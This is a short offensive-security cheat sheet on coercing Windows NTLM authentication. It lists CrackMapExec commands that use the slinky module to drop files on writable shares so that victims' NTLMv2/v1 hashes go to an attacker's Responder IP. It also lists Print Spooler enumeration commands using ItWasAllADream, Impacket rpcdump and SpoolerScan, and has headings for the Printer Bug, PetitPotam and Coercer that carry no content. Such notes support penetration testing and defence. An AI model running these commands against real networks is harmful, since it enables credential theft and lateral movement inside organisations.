Coercing Authentication
Harvest NTLMv2/v1 Hashes with Write Access to Shares
crackmapexec smb $ip -u $username -p $password --sharescrackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=[ResponderIP]crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=$responder_ip CLEANUP=TrueNotes
The Printer Bug
Enumerate Print Spooler Service
# Enumerate Print Spooler with ItWasALlADream
docker run -it itwasalladream -u $username -p $password -d $domain $target -v
# Enumerate with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M spooler
# Enumerate Print Spooler with Impacket
python rpcdump.py @$target | egrep 'MS-RPRN|MS-PAR'
# SpoolerScan.ps1
.\SpoolerScan.ps1Exploiting the Printer Bug with SpoolSample.exe
Remotely Exploiting the Printer Bug
PetitPotam
Trigger NTLM Authentication over HTTP
Coercer
References
Last updated